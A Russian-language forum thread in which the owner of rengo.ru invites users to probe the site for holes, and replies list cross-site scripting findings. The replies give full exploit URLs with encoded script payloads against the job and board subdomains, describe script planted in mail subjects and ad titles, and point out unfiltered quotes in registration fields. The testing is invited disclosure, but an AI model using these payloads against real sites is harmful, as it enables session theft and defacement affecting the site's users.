|
Проверьте портал Rengo.Ru
Здравствуйте! Кому не сложно, проверьте на уязвимости сайт – http://rengo.ru.
Сайт имеет «самописный» движок, и мы работали над системой безопасности, но все же лучше, если проверят настоящие хакеры. :) Сам сайт: http://rengo.ru. Также просьба проверить его подразделы - http://news.rengo.ru, mail.rengo.ru и т.д. Спасибо за помощь в поиске уязвимостей! blackybr ссылка на главной странице есть :) |
XSS
Цитата:
|
на mail.rengo.ru
Отправляем письмо, в теме пишем <script>alert(99)</script> - вылетает алерт |
На board.rengo.ru подаём объявление, в заголовке пишем тот же код, у модератора вылетит алерт)
|
http://job.rengo.ru/cgi-bin/login.pl
xss в логине http://job.rengo.ru/cgi-bin/usr_reg.pl xss везде Код:
http://job.rengo.ru/cgi-bin/story.pl?action=success&page_num=1'%22%3E%3Cscript%3Ealert(99)%3C/script%3EКод:
http://job.rengo.ru/cgi-bin/vmanager.pl?profession=&spec=68&expert=0&leader=0&min_age=&max_age=&edu=0&gen=N&work_place=0&city=1&metro=0&metrotime=0&city2=&min_sal=&max_sal=&work_type=0&work_graf=0&duty=&demand=&condition=&descr=&org=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&sphere=2&cont_name=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&phone_country=7&phone_code=495&phone_main=945646&phone_text=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&code=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&prior_days=0&home_days=0&preview=%CF%F0%E5%E4%EF%F0%EE%F1%EC%EE%F2%F0&action=addVacancy&set=add |
Цитата:
И пассивка в поиске в объявлениях - Код:
http://board.rengo.ru/search.php?q=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search_region=1 |
http://board.rengo.ru/register.php?code=2&type=1
не фильтруется ' в полях - Логин: E-mail: |
| Время: 18:16 |